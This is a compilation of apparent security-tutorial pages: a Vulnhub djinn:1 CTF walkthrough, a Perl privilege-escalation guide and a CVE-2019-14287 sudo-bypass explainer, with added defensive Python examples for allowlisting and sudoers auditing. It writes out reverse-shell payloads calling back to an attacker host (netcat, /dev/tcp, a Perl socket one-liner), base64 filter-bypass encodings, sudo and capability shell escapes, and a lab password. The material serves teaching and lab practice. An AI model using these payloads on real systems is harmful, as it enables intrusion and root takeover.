djinn:1 Vulnhub Walkthrough


Hello guys, today we will face an intermediate challenge: the djinn: 1 virtual machine, created by “0xmzfr” and available on Vulnhub. This is another Capture the Flag style challenge where we have to escalate privileges to the “root user” and find 2 flags to complete the challenge.
Since these labs are available on the Vulnhub website, we will be downloading the lab file from this link.
Penetration Methodologies:
·         Network Scanning
o   Netdiscover
o   Nmap Scan
·         Enumeration
o   FTP Enumeration
o   Browsing HTTP Service
o   Netcat
o   Directory Bruteforce using gobuster
o   Discovering Command Injection
·         Exploitation
o   Bypassing Command Injection Filter
o   Getting Netcat Session
o   Enumeration Files and Directories
·         Post Exploitation
o   Reading the User Flag
o   Getting Login Credentials
o   Enumeration for Sudo Permissions
·         Privilege Escalation
o   Abusing Sudo Rights
o   Confirm Root Access
o   Reading the Root Flag

Walkthrough
Network Scanning
The first step is to identify the target. So, to identify your target we will use the following command:
netdiscover
Now we will use Nmap to gather information about the open ports and the services running on the target machine, using the command:
nmap -p- 192.168.43.134
As we can see, port 21/TCP is open, so we can try an anonymous FTP login to fetch some useful information.
Enumeration
Yes! We are in! There are three files here, namely creds, game and message.
ftp 192.168.43.134
anonymous
ls
Let’s download these three files to our Kali machine and read their content.
The commands used to download these files are:
get creds.txt
get game.txt
get message.txt
We downloaded all three files to our Kali machine, and now it’s time to view their content using the cat command:
cat creds.txt
cat game.txt
cat message.txt
So we have three things that seem useful to us, but the SSH port is filtered, so these creds clearly can’t be used to log in via SSH. Let’s note down these three highlighted parts in a file for future reference.
According to the message.txt file, there is a game running on port 1337. Let’s play the game.
http://192.168.43.134:1337
We get an error: This page isn’t working. So in this case we will use Netcat to make the connection so that we can play the game:
nc 192.168.43.134 1337
As we can see in the above image, we need to answer simple maths questions 1000 times, and we are certainly not going to do that. Playing this game is time consuming, and we are not sure whether there is any reward for us after solving 1000 questions or just some greeting message to boost our confidence.
So, without wasting our time, let’s try the other open port, 7331.
We don’t find anything useful there. After checking the source code, there is no information that can be used to log in to any account on the targeted machine. So now we can think of directory brute force, meaning it’s time to find hidden directories and pages on this particular port. We used the gobuster tool for the directory brute force. This gave us two pages, ‘/genie’ and ‘/wish’.
gobuster dir -u http://192.168.43.134:7331 -w /usr/share/wordlists/dirb/big.txt
We opened the /genie page. It returns an ERROR 403, so this page might be of no use.
http://192.168.43.134:7331/genie
We opened the other page, named /wish. It contained the text “Oh you found me then go on make a wish. This can make all your wishes come true.”, followed by a form input field and a Submit button. This is absolutely interesting.
http://192.168.43.134:7331/wish
So it’s time to explore /wish. As there is a form on this page, we can think of OS command injection. Let’s try a common command to check whether we are going in the right direction or not:
id
The “id” command is executed successfully, which means we were right. This is OS command injection, and we can take advantage of this vulnerability to get a shell using Netcat.
Let’s do it!
Exploitation
We started a Netcat listener on our Kali Machine. Then we tried to invoke the Netcat shell from the Command Injection that we just found.
nc -nlvp 1234
nc -e /bin/sh 192.168.43.249 1234
It gives a message: Wrong choice of words
After trying a lot of commands, we can conclude that some symbols and characters are restricted: if those characters are present in the command, the command is not going to be executed.

After thinking a lot, we came up with a solution: what if we encode the whole command in base64, because commands like “echo”, “base64 -d” and “bash” are working?
Website used to encode: https://www.base64encode.org/enc/encore/
nc -e /bin/sh 192.168.43.249 1234
Encoded command: bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjQzLjI0OSAxMjM0
So now we will use the pipe (|) operator to chain these commands together.
After experimenting a lot with the /wish page, we came up with this command:
echo bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjQzLjI0OSAxMjM0 | base64 -d | bash
But our luck is not good; this doesn’t work. It gives no error, but this command doesn’t give us shell access either. Now it’s time to search for some other form of command to get a shell, and we will try this:
bash -i >& /dev/tcp/192.168.43.249/8080 0>&1
We encoded this command using the same website, and we will now submit the encoded command written below on the /wish page. Don’t forget to start the listener using the command shown below.
nc -nlvp 8080
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjI0OS84MDgwIDA+JjE=
We got the shell using this technique. We ran the command whoami to find out which user we got the shell as. It came out to be www-data.
We decided to look around the machine. We found a directory named 80 in the /opt directory and opened it. Here we find some files. We took a look at the app.py file and found the path to a file named creds.txt. Let’s change to the given directory and try to read the credentials.
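Why the /wish filter can be sidestepped, and what a safe design looks like: an added example (not the challenge's app.py) contrasting a word/character denylist, constructed here to mirror the observed behaviour, with an allowlist that maps each permitted wish to a fixed argv and never hands user text to a shell. The denied words and characters and the allowed wishes are my own choices.

```python
import shlex
import subprocess

# Constructed denylist mirroring the observed behaviour of /wish (the real
# filter in the challenge's app.py is not shown): a few forbidden words,
# checked per token, and a few forbidden shell metacharacters.
DENIED_WORDS = {"nc", "sh", "wget", "curl", "python"}
DENIED_CHARS = set(";&<>$`")


def denylist_filter(cmd: str) -> bool:
    """Insecure design: return True when the command passes the denylist."""
    if DENIED_CHARS & set(cmd):
        return False
    return not (DENIED_WORDS & set(cmd.split()))


# Hardened design: every permitted "wish" maps to a fixed argv that is run
# with shell=False, so the user's text is never parsed by a shell at all.
ALLOWED_WISHES = {
    "id": ["id"],
    "whoami": ["whoami"],
    "uptime": ["uptime"],
}


def allowlist_resolve(cmd: str):
    """Return the argv for an allowed wish, or None for anything else."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:            # unbalanced quotes and similar
        return None
    if len(tokens) != 1:          # no arguments, no pipes, no chaining
        return None
    argv = ALLOWED_WISHES.get(tokens[0])
    return list(argv) if argv else None


def grant_wish(cmd: str) -> str:
    """What the hardened endpoint would return for a submitted wish."""
    argv = allowlist_resolve(cmd)
    if argv is None:
        return "Wrong choice of words"
    return subprocess.run(argv, capture_output=True, text=True, timeout=5).stdout


if __name__ == "__main__":
    # The payload from the walkthrough: the denylist lets it through because
    # echo, base64 and bash are not forbidden and | is not a denied character.
    encoded = "echo bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjQzLjI0OSAxMjM0 | base64 -d | bash"
    print("denylist passes encoded payload:", denylist_filter(encoded))
    print("allowlist resolves encoded payload:", allowlist_resolve(encoded))
    print("allowlist resolves 'id':", allowlist_resolve("id"))
```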
ls
cat app.py
We navigated to the path mentioned in that file. We found the credential for the user nitish.
cd /home
cd nitish/.dev/
cat creds.txt
We decided to log in as nitish. To do this we first used the bash command, which invoked a bash shell, and then we converted that shell into a TTY shell using the Python one-liner.
bash
python -c 'import pty;pty.spawn("/bin/sh")'
We changed the user with the help of the su command. After entering the password that we found earlier we successfully logged in as nitish.
su nitish
p4ssw0rdStr3t0n9
whoami
Post Exploitation
Now we have reached a stage in our exploitation where we have access as a user. We decided to look for the hidden user flag. We traversed into the nitish user’s home directory, where we found user.txt. This is the User Flag. Congratulations!! We found our first flag.
ls
cd nitish
ls
cat user.txt
Now it’s time to check for Sudo rights of the user nitish using the command:
sudo -l
We found that the user nitish can execute the genie binary as user sam without any password.
As this is a custom, user-generated script, we started tinkering with it in order to understand how it works.
genie
genie -h
After messing around with this binary we successfully managed to get a shell of user sam using the command:
sudo -u sam genie -cmd new
whoami
Now we will try to get a stable shell using the bash command, and after that we will enumerate the sudo rights of the user sam. As we can see, we can execute /root/lago as root, so let’s do it!
bash
sudo -l
Privilege Escalation
After trying a lot, we found that if we can supply the correct number we can get access to a root shell, and yes, we were right this time too. After multiple tries, we entered the choice 2 and then typed in “num”, and successfully got a root shell.
sudo -u root /root/lago
2
num
whoami
We used the bash command to get a proper shell as the root user. Now that we are the root user, we need to find the root flag. Instead of wandering here and there, we decided to go to the root user’s home directory. Here we find a script named proof.sh.
bash
su root
cd
ls
We ran the script, and it gave us the final root flag that was needed to complete this CTF challenge.
./proof.sh
Author: Yash Saxena an undergraduate student pursuing B. Tech in Computer science and engineering with a specialization in cybersecurity and forensics from DIT University, Dehradun. Contact here.

Linux for Pentester: Perl Privilege Escalation


Here we are again, back with one very essential command, i.e. “Perl”. As we know, Perl has its significance in the era of programming languages specially designed for text editing. Apart from all of this, it is now also very prominent for a variety of purposes including Linux system administration, network programming, web development, etc. Keeping this fact in mind, we will proceed in this article to how we can take more advantage of this command in the operation of privilege escalation.

NOTE: “The main objective of publishing the “Linux for pentester” series is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalation. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files, etc.”
Table of Content
Overview of Perl             
·         Introduction: What is perl?
·         Where we use perl?
·         What are its necessities?
·         Multiple operations using perl.
Abusing Perl
·         SUDO Lab setups for privilege Escalation
·         Exploiting SUDO
·         Capabilities

What is perl ?

Perl is a programming language whose name stands for "Practical Extraction and Reporting Language". It was created by Larry Wall in 1987 and was specially designed for text editing purposes. As we all know, computers understand only binary language, i.e. “0,1”, or one can say low-level language, which is very difficult for humans to program in. So to overcome that difficulty we needed a programming language which uses natural language elements, words that are used in common English and can be easily understood by humans [a high-level language].

So once a program is coded by a human, it needs to be converted into the form that a computer understands. For that, we need something which can translate the high-level language to low-level language. Here the interpreter comes to our help: software that converts a program written in a high-level language to low-level language for the computer to understand and execute the instructions written in the program. Hence, Perl is an interpreted programming language.

It was originally a language optimized for scanning arbitrary text files, extracting information from those text files, and printing reports based on that information.



Where we use perl ?
The influence of Perl can be applied in many fields, and the most popular use of Perl is in web development. As we know, the major role and purpose of Perl is text editing, extracting data and generating reports. Perl has become a popular language used in web development, networking and bioinformatics too. Apart from all this, Perl can also be used for CGI programming.
What are its necessities?

As we all know, there are many programming languages that can be used to do all the stuff which can be achieved with the help of Perl.

So here the question arises: why should we specifically use “perl”? Perl is very easy to learn, particularly if you have a background in computer programming. It is extremely portable and can run on any operating system that has a Perl interpreter installed, so it is platform independent. All Linux operating systems come with Perl installed, so you can start Perl coding in Linux out of the box.

Compared with other languages, Perl is faster and more powerful in performing many tasks. It possesses many shortcuts which allow the user to write quick scripts. It was designed specifically for text processing, and its built-in text processing ability makes Perl a widely used server-side programming language.

Moving ahead in achieving our goal of privilege escalation, the very first thing we will check is its version. For this purpose we will use the “-v” option as shown below.
perl -v

To know more about all the operations that Perl can do, we will use its help option, which will point us to the other functionality.

perl -h

Multiple operations of perl

Help in scripting: Unlike programs written in languages such as C and C++, Perl programs do not need to be compiled for execution; Perl simply interprets and executes them. The term script is often used for such interpreted programs written in a shell's programming language or in Perl.
For example, as per the below image you can see I’ve created a file “script.pl” in which I have stored some lines of code, or one can say I have created a small script (one can use it to create any script as per requirements) that is to be executed and show its output on the screen. So, to view and run your script, use the commands below:

cat script.pl
perl script.pl


Help to execute code on the command line: This can be used to run a piece of Perl code without creating a file. Due to differences between the Unix/Linux shell and the MS Windows command prompt, we need to use different quotes around our code.
Here in the below screenshot I’m running a piece of code which prints “Welcome to Ignite Technologies”, using the “-e” argument to execute it.

perl -e 'print qq{Welcome to Ignite Technologies\n}'

Note: In simple words, one can say that the “-e” option is used to execute one line of code.


Help in a restricted shell environment: A user can use the -e option to break out from restricted environments by spawning an interactive system shell, and it plays a special role in privilege escalation. With its help we can also run any command in a restricted environment. In our case here, I’m using this option to run the tail command to display the last few lines of the /etc/passwd file.

perl -e 'exec "/bin/sh";'
perl -e 'exec "tail /etc/passwd";'

Help to wrap the code in a while loop: If we wish to wrap our code inside a loop over the input lines, so that it runs for each line and acts on those satisfying a condition defined in the Perl code, we use the “-n” option.
For example, in the below image you can see that I have a file named “Infosec.txt”, and here instead of displaying the whole content I just want to print those lines which fulfil a condition.

cat Infosec.txt
perl -n -E 'say if /Testing/' Infosec.txt

On running the above command, Perl checks each line of the file Infosec.txt and prints all those lines which contain our search word, i.e. Testing.


Help to edit file content: The perl command can also be used to edit the content of any file. For this we use the “-i” argument, which opens the files one by one and replaces their content with whatever the script writes to STDOUT.
As you can see in the below image, I’ve used this option to convert the content of the file Infosec.txt to upper case.

perl -pi -e 'tr/a-z/A-Z/' Infosec.txt
head -7 Infosec.txt

The most common use of “-p” together with the “-i” option is to provide "in-place editing". This means that instead of printing to the screen, all the output produced by our one-liner is written back to the same file it was read from. Here we are using this to replace one word with another.

perl -i -p -E 's/IGNITE/Egnite/' Infosec.txt
head -7 Infosec.txt

On running the above command, Perl will replace the word “IGNITE” with “Egnite” in the file Infosec.txt.


Perl in reverse shell: We all know that a reverse shell is a type of shell in which the target machine connects back to the attacking machine, and the attacking machine has a listener port on which it receives the connection.
So, here we are using a perl command which will send back a reverse shell to a listening attacker, opening remote network access.

perl -e 'use Socket;$i="192.168.29.157";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'


Before running the above command, run nc -lvp 1234 on the attacker box to receive the shell.
nc -lvp 1234
id
whoami
Abusing perl
Sudo Rights Lab setups for Privilege Escalation
Above, we have covered the main operations that Perl can perform, but now we will move ahead with the task of privilege escalation. To do this, first we have to set up our lab with the perl command having administrative rights. After that we will check what impact perl has after getting sudo rights and how we can use it further for privilege escalation.

From the below image it can be clearly understood that I have created a local user (demo) who has sudo rights as root and can carry out all tasks as admin.
To add the sudo right, open the /etc/sudoers file and type the following under the user privilege specification:

demo ALL=(ALL) NOPASSWD: /usr/bin/perl

Exploiting Sudo rights

Having added user “demo” to the /etc/sudoers file, we will now start exploiting the perl facility by taking advantage of the sudoers permission. For this, we must first have a session on the victim’s machine; only then can we execute this task. Suppose we got a session on the victim’s machine that gives us local user access to the targeted system, through which we can escalate to root user rights.
So now we will connect to the target machine with SSH; therefore, type the following command to get access through the local user login.

ssh demo@192.168.29.137

Then we look for the sudo rights of the “demo” user (if given) and find that user “demo” can execute the perl command as “root” without a password.

whoami
sudo -l
sudo perl -e 'exec "/bin/bash";'
whoami


Capabilities in Privilege Escalation

As we know, whenever the sticky bit is set on a file, every privileged and unprivileged user can easily access that file, but if for security purposes we want to share or grant access to it only to a limited/single user, we can simply use capabilities to achieve this.

Capability-based security refers to the principle of designing user programs such that they directly share capabilities with each other according to the principle of least privilege, to make transactions efficient and secure. For this task we simply copy the file to the /home of the selected user to make it securely accessible.

As stated above, I’ve added user “demo” to /etc/sudoers and know that user “demo” can execute the perl command as “root” without a password, but I also want nobody except this user to be able to access this file, so I will set capabilities for this user as shown below.

which perl
cp $(which perl) /home/demo
setcap cap_setuid+ep /home/demo/perl


From the below image it is clear that user “demo” can easily execute “perl” as root, and hence we have successfully accomplished our mission of privilege escalation using perl.

./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
id


Conclusion: The main purpose of this article is to use the “perl” command for privilege escalation; that’s why we have covered only the basic operations that can be achieved with this command.

SUDO Security Policy Bypass Vulnerability - CVE-2019-14287


After the detection of a major security vulnerability, an immediate security fix was officially released for the ' sudo ' package in the Ubuntu repositories. If you are not aware of the power of sudo rights, then read this post, “Linux Privilege Escalation using Sudo Rights”, which will help you understand more about “CVE-2019-14287”, the latest vulnerability, which we will discuss in this post.

In sudo before 1.8.28, the vulnerability CVE-2019-14287 is a security policy bypass issue in Linux/Ubuntu before 19.10 that offers a local user or a program the ability to carry out commands as root or superuser on a Linux system even when the "sudoers configuration" explicitly prohibits root access.

For example, this allows bypass of an "!root" configuration, and of USER= logging, for a "sudo -u \#$((0xffffffff))" command.

Exploiting CVE-2019-14287

Victim’s Machine
Let’s suppose the system admin has created a local user who is not allowed to perform high-privilege tasks such as “cat /etc/shadow” to read the saved passwords of the system.



Similarly, we have created a user “demo” who is not able to run privileged tasks as superuser.


But suppose the admin makes the following configuration in the sudoers file:
demo ALL=(ALL,!root) ALL

where the admin has assigned sudo rights to the user “demo” to run programs or commands as any user other than root, and clearly prohibits root access using !root.


Or the system admin can use the following configuration too, which states the same permission as said above:
demo ALL=(ALL,!#0) ALL


Let’s understand once again what this sudo right is and what it defines as configured above, with the help of the following image:
Username: demo
Host: ALL
Runas (user): ALL,!root
Runas(group): ALL,!root
Tag: NOPASSWD
Command to execute: ALL
So basically here demo is defined to execute ALL commands as ALL (User, Group) other than root (User, Group), and “ALL,!root” is a misconfiguration that causes a security loophole: the user demo is restricted from performing tasks as root, but not from acting as the administrator, so as a result he can still run a command as the administrator (user "root").


In other words, this fault gives a local user (attacker) the privilege of accessing a root shell, as demonstrated. Assume the attacker has a shell on the host machine as a local user and has found the above-mentioned sudo rights; then the attacker can easily escalate to root privileges by using the user id -u#-1.

sudo -u#-1 /bin/bash
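As an added defensive check, not part of either article above, the following audit flags the three risky conditions discussed on this page: sudo rules that hand out an interpreter (the NOPASSWD /usr/bin/perl rule), binaries carrying cap_setuid (the copied perl), and Runas negations like (ALL,!root) or (ALL,!#0), which are only a denylist and are bypassed on sudo before 1.8.28 (CVE-2019-14287). The sudoers text, getcap output and version banner are constructed samples, and the INTERPRETERS set is my own choice.

```python
import re

# Constructed sample inputs (not captured from a real host): a sudoers excerpt
# mirroring the rules discussed above and two lines of `getcap -r /` output.
SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
demo    ALL=(ALL) NOPASSWD: /usr/bin/perl
demo    ALL=(ALL,!root) ALL
demo    ALL=(ALL,!#0) ALL
nitish  ALL=(sam) NOPASSWD: /home/sam/genie
"""
GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/home/demo/perl = cap_setuid+ep
"""

# Interpreters that hand the caller an arbitrary shell when run through sudo.
INTERPRETERS = {"perl", "python", "python3", "ruby", "bash", "sh"}

SUDO_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
NEGATED_ROOT = re.compile(r"!\s*(root|#0)\b")


def parse_sudo_version(banner: str) -> tuple:
    """'Sudo version 1.8.21p2' -> (1, 8, 21); unknown -> (0, 0, 0)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else (0, 0, 0)


def audit_sudoers(text: str, version: tuple) -> list:
    """Return (severity, user, issue, detail) tuples for risky rules."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        m = SUDO_RULE.match(line)
        if line.startswith("#") or not m or m["user"] == "root":
            continue
        runas_user = m["runas"].split(":")[0]
        # (ALL,!root) / (ALL,!#0) is a denylist: before sudo 1.8.28 it is
        # bypassed by asking for uid -1 / 4294967295 (CVE-2019-14287).
        if NEGATED_ROOT.search(runas_user):
            sev = "HIGH" if version < (1, 8, 28) else "LOW"
            findings.append((sev, m["user"], "runas-negation", f"({m['runas']})"))
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            prog = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or prog in INTERPRETERS:
                findings.append(("HIGH", m["user"], "shell-via-sudo", f"{cmd} as {runas_user}"))
    return findings


def audit_getcap(text: str) -> list:
    """Flag binaries carrying cap_setuid/cap_setgid (e.g. a copied perl)."""
    findings = []
    for line in text.splitlines():
        parts = line.split(" = ", 1) if " = " in line else line.split(None, 1)
        if len(parts) == 2 and re.search(r"cap_set[ug]id", parts[1]):
            findings.append(("HIGH", parts[0], "setuid-capability", parts[1]))
    return findings


if __name__ == "__main__":
    version = parse_sudo_version("Sudo version 1.8.21p2")  # constructed banner
    for f in audit_sudoers(SUDOERS, version) + audit_getcap(GETCAP):
        print("\t".join(f))
```

Both the older `path = caps+ep` and the newer `path caps=ep` getcap output formats are accepted.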